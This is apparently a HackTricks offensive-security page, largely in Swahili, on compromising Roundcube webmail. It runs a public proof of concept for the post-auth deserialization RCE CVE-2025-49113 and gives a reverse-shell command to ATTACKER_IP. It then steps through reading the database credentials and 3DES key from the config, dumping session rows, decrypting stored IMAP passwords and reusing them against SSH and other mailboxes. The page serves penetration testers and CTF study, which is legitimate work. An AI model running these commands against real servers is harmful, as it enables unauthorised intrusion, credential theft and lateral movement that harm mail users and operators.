Roundcube

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Muhtasari

Roundcube ni mteja wa webmail wa PHP ambao mara nyingi unaonyeshwa kwenye vhosts za HTTP(S) (mfano, mail.example.tld). Useful fingerprints:

• Chanzo cha HTML mara nyingi leaks rcversion (e.g., window.rcmail && rcmail.env.rcversion)
• Njia ya programu ya chaguo-msingi katika containers/VMs: /var/www/html/roundcube
• Marekebisho kuu: config/config.inc.php

Authenticated RCE via PHP object deserialization (CVE-2025-49113)

Matoleo yaliyoathiriwa (kwa mujibu wa vendor/NVD):

• 1.6.x before 1.6.11
• 1.5.x before 1.5.10

Muhtasari wa hitilafu

• Parameter _from katika program/actions/settings/upload.php haijatathminiwa, kuruhusu injection ya data inayodhibitiwa na attacker ambayo Roundcube baadaye unserializes, ikielekeza gadget chain execution na remote code execution katika muktadha wa wavuti (post‑auth).

Quick exploitation

• Requirements: valid Roundcube credentials and a reachable UI URL (e.g., http://mail.target.tld)
• Public PoC automates session handling, gadget crafting and upload flow

git clone https://github.com/hakaioffsec/CVE-2025-49113-exploit.git
php CVE-2025-49113.php http://mail.target.tld USER PASS CMD

# examples
php CVE-2025-49113.php http://mail.target.tld user 'pass' "id"
# blind timing proof
time php CVE-2025-49113.php http://mail.target.tld user 'pass' "sleep 5"

# reverse shell
nc -nvlp 443
php CVE-2025-49113.php http://mail.target.tld user 'pass' \
"bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1'"

Vidokezo

• Matokeo mara nyingi hayajaonekana; tumia sleep N kuthibitisha RCE
• Shell inayopatikana kawaida huendesha kama www-data; kwenye containerised deployments tarajia /.dockerenv na mitandao 172.17.0.0/16

Post‑exploitation: rejesha nywila za IMAP kutoka kwenye vikao vya Roundcube

Roundcube huhifadhi nywila ya IMAP ya mtumiaji wa sasa katika vikao (database) iliyofichwa kwa 3DES key ya server‑side iliyosanidiwa katika config.inc.php. Ukiwa na ufikiaji wa filesystem au DB kwenye mwenyeji wa Roundcube unaweza kufufua nywila za wazi (plaintext) na kuingia katika mailboxes/servisi nyingine (re-use ya SSH ni ya kawaida).

1. Soma DB DSN na 3DES key kutoka config

config/config.inc.php typically contains:

$config['db_dsnw'] = 'mysql://roundcube:DB_PASS@localhost/roundcube';
$config['des_key'] = 'rcmail-!24ByteDESkey*Str'; // 24‑byte key (3DES)

2. Unganisha kwenye DB na dump sessions

mysql -u roundcube -p roundcube
# or: mysql -u roundcube -pDB_PASS roundcube

mysql> SELECT id, created, changed, vars FROM session\G

Uwanja session.vars ni blob ya Base64 inayotengenezwa na Roundcube’s encrypt(): Base64( IV || 3DES-CBC(plaintext) ). Baiti 8 za kwanza baada ya Base64‑decoding ni IV.

3. Pata uwanja wa password

Njia ya haraka ya kutambua credential ndani ya muundo uliodecrypted ni kwanza kufanya Base64‑decode ya uwanja session.vars na kuangalia serialized entries kwa macho:

echo 'BASE64_FROM_VARS' | base64 -d | tr ';' '\n' | grep -i password

4. Decrypt kwa kutumia msaidizi wa Roundcube

Roundcube inakuja na CLI inayotumia mantiki ile ile ya rcmail->decrypt() na des_key iliyosanidiwa:

cd /var/www/html/roundcube
./bin/decrypt.sh CIPHERTEXT_BASE64
# -> prints plaintext

5. Kufungua 3DES-CBC kwa mkono (hiari)

• Muundo wa ciphertext: Base64( IV(8B) || CT )
• Alg: 3DES-CBC, key length 24B, PKCS#7 padding

from base64 import b64decode
iv_ct = b64decode('hcVCSNXOYgUXvhArn1a1OHJtDck+CFME')
iv, ct = iv_ct[:8], iv_ct[8:]
print(iv.hex(), ct.hex())
# decrypt(ct) with key = $config['des_key'], IV = iv

Maeneo ya kawaida

• DB table: session (users table maps login names to IDs)
• Config path: /var/www/html/roundcube/config/config.inc.php

Matumizi ya uendeshaji

• Safu za session za zamani mara nyingi zina IMAP passwords za watumiaji wa awali; decrypt multiple entries ili kuhamia kwa upande kwenye mailboxes nyingine
• Jaribu recovered credentials dhidi ya SSH au huduma nyingine ikiwa suspected credential reuse

Marejeo

• Roundcube security updates 1.6.11 and 1.5.10
• CVE-2025-49113 – NVD
• FearsOff research notes on Roundcube deserialization/RCE
• hakaioffsec/CVE-2025-49113-exploit (PoC)
• Roundcube bin/decrypt.sh helper
• HTB Outbound – 0xdf write‑up (Roundcube 1.6.10 → RCE → session decrypt pivot)

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.